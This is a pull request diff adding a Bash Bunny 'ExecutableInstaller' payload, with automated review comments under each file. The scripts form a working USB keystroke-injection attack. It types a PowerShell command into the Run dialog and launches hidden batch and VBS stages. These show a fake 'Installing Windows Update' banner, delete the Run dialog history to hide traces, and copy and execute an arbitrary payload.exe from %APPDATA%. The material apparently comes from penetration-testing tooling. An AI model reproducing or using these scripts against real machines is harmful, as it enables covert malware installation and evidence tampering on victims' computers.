Merge pull request #11 from IMcPwn/executableinstaller
Add ExecutableInstaller payload
Showing 5 changed files with 77 additions and 0 deletions.
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,4 @@ | ||
@echo off | ||
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" | ||
cscript %~dp0\i.vbs %~dp0\e.cmd | ||
@exit |
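Review bot: the PowerShell CAPSLOCK line in this file has no comment, and the same line is repeated verbatim at the end of e.cmd, where it is labelled "Blink CAPSLOCK key (from usb_exfiltrator)". Add the same REM here, or keep the blink in one stage only, so a reader can tell what each blink signals. On the cscript line, `%~dp0` already ends in a backslash and both paths are unquoted; drop the extra `\` and quote them.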
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,23 @@ | ||
@echo off | ||
@echo Installing Windows Update | ||
|
||
REM Delete registry keys storing Run dialog history | ||
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f | ||
|
||
REM Below is for copying a directory with a payload inside the root directory of the Bash Bunny USB Mass Storage. | ||
REM echo d | xcopy /C /Q /Y /E %~dp0\..\..\PAYLOAD_FOLDER_IN_ROOT %APPDATA%\PAYLOAD_FOLDER_IN_ROOT | ||
|
||
REM Copy payload.exe from the root of the bash Bash Bunny USB Mass Storage (change to whatever you like). | ||
copy %~dp0\..\..\payload.exe %APPDATA%\payload.exe | ||
|
||
REM Below is for executing a payload inside a directory (see comments above). Change --startup to whatever parameters you wish to pass (or remove it). | ||
REM start "" "%APPDATA%\PAYLOAD_FOLDER_IN_ROOT\payload.exe" --startup | ||
|
||
REM Launch payload.exe with the startup parameter. Change --startup to whatever parameters you wish to pass (or remove it). | ||
start "" "%APPDATA%\payload.exe" --startup | ||
|
||
REM Blink CAPSLOCK key (from usb_exfiltrator) | ||
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" | ||
|
||
@cls | ||
@exit |
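Review bot: the `REG DELETE ...\RunMRU /f` near the top deletes the user's whole Run dialog history, not only the entry this payload typed, and neither the README nor the payload.txt header mentions it. Document that side effect, since it alters host state that an authorized test has to report, and explain the "Installing Windows Update" banner in the same place. The result of `copy` is also never checked before `start`, so a missing payload.exe fails with no signal; test `errorlevel` after the copy and skip the launch when it fails.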
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1 @@ | ||
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False |
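Review bot: `WScript.Arguments(0)` is read without checking `WScript.Arguments.Count`, so running i.vbs with no argument raises a runtime error. Add a count check, and a one-line comment stating that the `0` window style hides the window and that `False` means the script does not wait for the command to finish.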
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,22 @@ | ||
#!/bin/bash | ||
# | ||
# Title: ExecutableInstaller | ||
# Author: IMcPwn | ||
# Version: 1.0 | ||
# Target: Windows 7+ | ||
# | ||
# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, | ||
# which in turn executes e.cmd invisibly using i.vbs | ||
# which in turn copies payload.exe from the root of the Bash Bunny and then executes it | ||
# using the --startup parameter. Change these settings inside of e.cmd. | ||
# | ||
LED R | ||
ATTACKMODE HID STORAGE | ||
QUACK GUI r | ||
QUACK DELAY 100 | ||
# TODO: Verify $SWITCH_POSITION | ||
QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\$SWITCH_POSITION\d.cmd')" | ||
QUACK ENTER | ||
|
||
# Green LED for finished | ||
LED G |
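Review bot: the `# TODO: Verify $SWITCH_POSITION` above the QUACK STRING line is still open, and nothing in this file assigns `SWITCH_POSITION`. Inside bash double quotes `\$` is a literal dollar sign, so as written the variable is not expanded in the typed path; resolve the TODO before merging. Separately, `LED G` is set immediately after `QUACK ENTER`, so green only means the keystrokes were sent, while the README status table calls it "Attack Complete"; reword one or the other.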
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,27 @@ | ||
# ExecutableInstaller for Bash Bunnys | ||
|
||
* Author: IMcPwn | ||
* Version: Version 1.0 | ||
* Target: Windows | ||
|
||
## Description | ||
|
||
Copies an executable (or executable in a directory) from the Bash Bunny USB Mass Storage | ||
to %APPDATA% and then executes it with the --startup parameter (or whatever parameter you want). | ||
|
||
## Configuration | ||
|
||
By default the staged payload copies the payload payload.exe from the root of the Bash Bunny, rename this to whatever you like inside | ||
by editing e.cmd. | ||
The payload copies to %APPDATA%, change this to wherever you like by editing e.cmd. | ||
You may also copy a payload inside a directory, see comments in e.cmd. | ||
|
||
## STATUS | ||
|
||
| LED | Status | | ||
| ------------------ | -------------------------------------------- | | ||
| Red | Attack Setup | | ||
| Green | Attack Complete | | ||
|
||
## Discussion | ||
[Hak5 Forum Thread](https://forums.hak5.org/index.php?/forum/92-bash-bunny/ "Hak5 Forum Thread") |
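Review bot: the header says "Target: Windows" while payload.txt says "Target: Windows 7+", and "Version: Version 1.0" repeats the word; make the two files agree. The Configuration section should also list the files that have to sit in the switch folder (d.cmd, e.cmd, i.vbs) and state that e.cmd deletes the RunMRU registry key. The Discussion link points at the forum index rather than a specific thread.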